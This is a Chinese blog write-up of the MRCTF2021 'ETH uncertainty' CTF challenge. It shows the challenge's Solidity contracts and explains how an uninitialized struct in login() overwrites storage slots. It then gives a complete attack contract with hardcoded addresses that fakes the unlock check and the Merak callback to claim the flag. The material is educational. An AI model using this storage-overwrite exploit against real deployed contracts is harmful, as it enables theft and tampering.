MRCTF2021 ETH uncertainty

最新推荐文章于 2022-04-27 09:34:53 发布
最新推荐文章于 2022-04-27 09:34:53 发布
阅读量664 收藏 1
点赞数 2
分类专栏: 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/115978984
版权

区块链 智能合约 逆向工程 安全分析 CTF挑战
关键词由CSDN通过智能技术生成

前言

昨天前天遇到的区块链题目有有些远超我目前的能力范围了,因此做的非常难受,决定先扔了,循序渐进,不好高骛远。突然想到MRCTF2021的那2道区块链自己还没有去复现,昨天想着去复现,今天发现MRCTF的站关了。。。利用着大师傅的WP上面的记录,找到了目标合约,进行复现。不过这题本身是没有给源码的,是需要逆向的,奈何我源码都读了几遍了才知道。。。没办法就直接拿着源码来复现叭。这题的难点其实还是逆向,直接看源码的话就会简单许多。

WP

源码:

pragma solidity ^0.4.17;

interface merak {
    function Merak(uint) view public returns (bool);
}

contract unlock{
    uint win;
    address owner;
    bool public winned;

    constructor() payable {
        owner = msg.sender;
        winned = false;
    }

    function getaddress()public returns(address) {
        return address(this);
    }
}

contract flag { // first contract

    address public owner;
    mapping(uint256=>bool) is_successful;

    constructor() payable {
        owner = msg.sender;
    }

    function getaddress() public returns(address) {
        return address(this);
    }

    function getflag() public payable {
        challenge A = challenge(owner);
        require(A.gettingflag());
        is_successful[uint256(challenge(owner).tt())] = true;
    }
}

contract ez{
    uint win;
    address public owner;
    bool public success;

    constructor() payable {
        owner=msg.sender;
    }

    function getaddress() public returns(address) {
        return address(this);
    }

    function betting(uint ss) public payable {
        address target = challenge(owner).tt(); // set tt to hacker address
        merak hack = merak(target);
        if(!hack.Merak(ss)){ // 123 returns 0
            win = ss;
            success = hack.Merak(win); // 123 return 1
        }
    }
}

contract challenge{
    address public target1; // 0  a -> control
    address public target2; // 1
    uint256  length;        // 2  c -> control
    address public tt;      // 3
    bytes32[] public a;     // 4
    uint256 meiyong;        // 5
    address public target3; // cannot overload
    unlock A;
    flag B;
    ez C;

    struct edge {
        uint256 loginid;    // 0
        uint256 time;       // 1
        uint256 maybe;      // 2
        uint256 val;        // 3
        address logined;    // 4
    }

    constructor() payable {
        A=(new unlock).value(0.0001 ether)();
        B=(new flag).value(0.0001 ether)();
        C=(new ez).value(0.0001 ether)();
        target1=address(A);
        target2=address(B);
        target3=address(C);
    }

    function login(uint256 a, uint256 c) public payable { // call login to overwrite target1
        edge temp;
        temp.loginid = a;
        temp.time = now%1000;
        temp.maybe = c;
        temp.val = msg.value;
        temp.logined = msg.sender;
        tt = msg.sender;
    }

    function getaddress()public {
        target1=A.getaddress();
        target2=B.getaddress();
        target3=C.getaddress();
    }

    function pop() public {
        require(msg.value==0.1 ether);
        length--;
        for(uint256 i=0; i<=length; i++)
            a[i]=a[i+1];
        msg.sender.call.value(msg.value)();
        require(length>=0);
    }

    function push(bytes32 num) public {
        length++;
        require(msg.value==0.1 ether);
        msg.sender.transfer(msg.value);
        for(uint256 i=length; i>=1; i--) {
            a[i]=a[i-1];
        }
        a[0]=num;
    }

    function revise(bytes32 tt,uint256 len)public {
        require(len<=length, "not enough");
        a[len]=tt;
    }

    function gettingflag() public returns(bool) {
        ez(target3).betting(123);
        if (ez(target3).success() == true && unlock(target1).winned() == true)
            return true;
        else 
            return false;
    }
}

一共四个合约,当时题目放出的是flag合约的地址。先把源码认真审几遍,理清楚代码的整体意图。想要获得flag,需要这样:

    function getflag() public payable {
        challenge A = challenge(owner);
        require(A.gettingflag());
        is_successful[uint256(challenge(owner).tt())] = true;
    }

看一下gettingflag()

    function gettingflag() public returns(bool) {
        ez(target3).betting(123);
        if (ez(target3).success() == true && unlock(target1).winned() == true)
            return true;
        else 
            return false;
    }

暂时放一下,看一下challenge。首先就是这里很明显的未初始化的结构体,可以覆盖:

    function login(uint256 a, uint256 c) public payable { 
        //未初始化的结构体,从slot0开始覆盖
        edge temp;
        //target1由a控制
        temp.loginid = a;
        temp.time = now%1000;
        //uint256  length由c控制
        temp.maybe = c;
        //address public tt由msg.value控制
        temp.val = msg.value;
        //bytes32[] public a的长度由msg.sender决定,这会变得很长。
        temp.logined = msg.sender;
        //tt本来由msg.value覆盖,现在又被msg.sender覆盖。
        tt = msg.sender;
    }

target1是我们可控的,可以控制为我们自己构造的一个恶意合约,在gettingflag()函数的这里:unlock(target1).winned() == true,可以非常轻松的满足。
再看一下这里:

        ez(target3).betting(123);
        if (ez(target3).success() == true

    function betting(uint ss) public payable {
        //address public tt;
        address target = challenge(owner).tt(); 
        //
        merak hack = merak(target);
        if(!hack.Merak(ss)){ 
            win = ss;
            success = hack.Merak(win); 
        }
    }

这个merak合约来自challenge的tt,同样会收到上面那个覆盖的影响:

tt = msg.sender;

因此在攻击合约里写一个Merak函数即可,第一次返回false,第二次返回true。
理清了,直接攻击即可:

pragma solidity ^0.4.17;

contract unlock{
    bool public winned = true;
}   

interface challenge{
    function login(uint256 a, uint256 c) external payable ;
    function getaddress() external ;
    function pop() external ;
    function push(bytes32 num) external ;
    function revise(bytes32 tt,uint256 len) external ;
    function gettingflag() external returns(bool) ;
}
interface flag {
    function getflag() external payable ;
}

contract Feng {
    bytes32 public location = keccak256(abi.encodePacked(uint(this), uint(1)));
    challenge constant private target = challenge(0xDb8d039189547D4a7766912503d101FEE7bb1c7f);
    unlock public c1  = new unlock();
    uint256 public a = uint256(address(c1));
    flag constant private flagTarget = flag(0x47b9bdCFFCC6bb1851442E5e9dacCBE6F84C1841);
    bool public merakFlag = false;
    function Merak(uint) view public returns (bool){
        if(merakFlag == true) return true;
        merakFlag = true;
        return false;
    }
    function attack() public {
        target.login(a,2**256-1);
        flagTarget.getflag();
    }
}

这个location是计算了flag合约中mapping(uint256=>bool) is_successful;,我们的恶意合约在storage中存储的位置,攻击之后如果不确定,可以再利用web3.js来查看一下这个量,看看是不是true:
在这里插入图片描述

bfengj
关注
专栏目录
Eth 01 - Eth以太网控制器驱动概述和API讲解
12-29 1614
在CAN/CANFD、FlexRay等总线中,有控制器Controller和收发器Transceiver。类似地,在以太网总线中,有以太网控制器和以太网收发器。看似废话。但是在OSI模型中,太网控制器和以太网收发器对应术语MAC和PHY。
[MRCTF2021]Web复现ez_larave1
Huamang的博客
04-20 935
ez_larave1 考察的是Laravel的CVE-2019-9081,影响版本为5.7.x get到一个新工具:BeyondCompare,用来比较文件差异的,可以比较方便的看出他做了哪些开发 把5.7.x的源码下载下来,比较一下,发现序列化! 有个小绕过,在serialize后随便加一点东西就可以了,比如serializeabc 与网上的poc不同,他的路由命名为hello了,在hello路由下可以执行反序列化 在网上找到的cve复现,看到漏洞是在PendingCommand.php出现的,跑去看
MRCTF 2021 8bit adventure
weixin_45966329的博客
04-14 346
MRCTF 2021 8bit adventure 程序大概的意思是只能用一个字节的汇编语句进行orw 要注意的是程序中使用了close(0),使用使用open系统调用时返回的文件描述符应该是0 懂汇编就会做 from pwn import * context(os='linux', arch='x86',log_level='debug') io=process("adventure") # ebx,ecx,edx # open 利用自加和自减控制寄存器的值,利用push和pop 还有修改esp 在栈上
MRctf 2021
m0_50967960的博客
04-15 210
MISC 零宽字符隐写:不可见的,不可打印的字符 https://blog.csdn.net/Amherstieae/article/details/108909743
MRCTF 2021 Dynamic Debug
__ys的博客
04-15 342
Dynamic Debug (这是除了签到题我唯一能做的了,据说它还是出题人的失误 ) 得到ELF文件,先用虚拟机跑一下 丢进IDA 通过搜索字符串找到main函数 首先可以得知flag的长度为32,其次当我们继续分析会发现验证函数被添加了花指令,IDA无法识别。 这时我们动调一下就会发现动调后的代码发生了变化,可以初步判定为smc。 然后就可以找到一段极其像验证函数的代码 但是这一部分IDA没有分析,我们找到函数头P一下创建函数 发现F5后代码极其不可读,需要平衡一下堆栈,用keypatch在函
[MRCTF 2021]wwwafed_app
fightte的博客
05-18 415
之前打的MRCTF,没做出来什么题,也算是一种体验了~ 这是大佬带出来的一道题: 进去之后是一个前端界面,先看前端,有一个输入框,输入域名来检测是否能连通,右上角,有一个waf source,可以点击: 得到和waf有关的源码: import re,sys import timeout_decorator @timeout_decorator.timeout(5) def waf(url): # only xxx.yy-yy.zzz.mrctf.fun allow pat = r'
ETH3D双目数据集
04-02
ETH3D双目数据集是计算机视觉领域一个重要的资源,主要针对三维重建和立体匹配任务。这个数据集是由ETH Zurich的研究团队创建的,旨在推动深度估计、立体匹配和三维几何理解的技术发展。在这个数据集中,包含了双目...
ETH系列串口服务器配置软件(ETH001(含C/E),ETH002,ETH005)
05-21
ETH系列串口服务器配置软件,含ETH001,ETH001-C,ETH001-E,ETH002,ETH005
eth-julia-gpu-HS2021-web:eth-julia-gpu-HS2021网站登录页面
03-04
标题中的"eth-julia-gpu-HS2021-web"可能是指一个特定的项目或者研究,其中"eth"可能是代表 Ethereum(以太坊)或者是ETH Zurich(瑞士联邦理工学院),"julia"指的是Julia编程语言,"gpu"表明项目涉及到图形处理器...
ETH-01网络模块分享.zip
06-29
配套我有一篇专门介绍ETH-01使用详情的文章,如果你是做单片机设计的,相信一开始也会遇到对于网络模块使用的迷茫,相信那篇文章和这个资源能帮助你更好的理解模块使用模块,和你的微单联系起来,实现单片机+模块+...
MRCTF2021 dynamic_debug新手详细复现
m0_51357657的博客
04-15 414
Dynamic_debug 一道惦记了很久的题,今天终于!历尽千辛万苦 复现出来,必须得记录了~~~根据题目,大概率要动调,看了官方wp知道了是smc(MR师傅tql),那确实得动调了,静态的话再怎么修复出来都是不对的。 以下详细记录一个新手废物怎么胡改乱改 修复代码的: (如果有错的地方请路过的师傅们指点!谢谢谢谢!) Step1, 按C强制转换 得到关键汇编代码部分,先随便找个大概位置下断,开始动调: 开始位置按P创建Function,在长度判断跳转处下断绕过 呃,提前说明哈,我是在看了官方wp知
2021-04-06,[MRCTF2020]PYWebsite,[MRCTF2020]pyFlag
探针一号的博客
04-07 570
1
MRCTF2021&Super32官方exp的复现
qq_39948058的博客
08-26 377
Mrctf&Super32官方exp复现 **前言: 说实话,这次MRCTF的比赛题的质量很高,高的我这种菜鸡都不太会做,所以赛后根据官方的exp来复现一下,这里只简绍一下exp的大概思路/ 思路:我们要让其换表,也就是base32编码后再进行换表,换表后再与解码后的大小check进行替换,结果其大于预先程序设定的大小,这样就直接产生了溢出,这里官方的exp是溢出打top chunk的size,然后进行分配打tc chunk的fd进行malloc_hook为rce,就可以获得shell了。 相对于
[MRCTF2021]ez_laravel复现
fightte的博客
05-21 602
前言 还是之前打的mrctf,难度比较大,也是第一次正式比赛出现了lara题目,近来多数比赛,包括CISCN都习惯出lara的题目,算是比较好的框架,但当时被带的做起了,现在复现一次: 考察的是Laravel的CVE-2019-9081,影响版本为5.7.x,当时别个搜CVE也能搜出来,先下载下来,lara5.7 但lara5.7里面没有vendor,在文件夹下,用cmd命令 composer install就可产生: 开始对比: 主要差别确实就是MRCTF的www_laravel,其app/Http/
mrctf
shinygod的博客
04-27 1050
webcheckin 这边的后台检测有点迷,只要再payload前加些其他数据就可以绕过。 例如: <?php class Modifier { protected $var='php://filter/read=convert.base64-encode/resource=flag.php'; } class Show{ public $source; public $str; public function __construct($file='index.ph
MRCTF
Amherstieae的博客
04-24 1836
写在前面:这里是β-AS,是被这次比赛虐的体无完肤的菜鸡,通过这次比赛学到了很多知识,包括各种工具和命令(渣渣路过)虽然很多都是知识盲区,ε=(´ο`*)))唉还是我刷的题不够多 还有一个体会是:为什么压缩包没有忘记密码这个选项(o(╥﹏╥)o) CYPTO 。1古典密码知多少 当当当!!首先出现的是古典密码——猪圈及其变形(圣武士密码),还有宇宙的信号~ 猪圈咱就不说了,都是老熟人了 附上银河...
mrctf-wp- re
令则
03-30 1109
mrctf-wp re pwn 题目贼棒,出题师傅们tql! 其他题目都不会,猜的 比赛的id: 1ing23 - 文章目录mrctf-wpreTransformPixelShooterlolhello_world_goJunkHard-to-goShitEasyCppVirtual TreepwneasyoverflowshellcodeEasy_equationcryptokeyboar...
MRCTF writeup
abtgu的博客
03-30 1336
文章目录MISCeamiscCyberPunk千层套路你能看懂音符吗Crypto古典密码知多少天干地支+甲子keyboardvigenere MISC eamisc 题目: Flag到底在哪嘞? 解题思路: 打开发现png格式图片,猜测高度被改写,写脚本进行CRC爆破,得到高度。 CyberPunk 题目: Hacking_security! 解题思路: 打开执行文件,发现需要的运行时间是2...
MRCTF (re和crypto)wp
YenKoc的博客
03-31 588
RE: 一.PixelShooter(这题比赛我居然没看,靠,血亏,所以做不出来就不要一直死怼,这题挺好写的,) unity一般是用c#写的,刚好又是apk,可以用dnspy来反编译看看,在源码中找到了flag,应该要安装apk,玩一下,再来找线索,会更好,然后要去看控制类这块,一般核心代码在那边 太困了,后续还得写 ...
ETH2232X ETH001模块配置与使用教程
"ETH2232X ETH001快速使用指导手册" 本文档主要介绍了ETH2232X ETH001系列模块的快速使用步骤,包括上电运行、连接网络、配置模块参数以及测试串口转以太网数据传输。首先,使用这些模块时需注意不同型号的供电电压...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值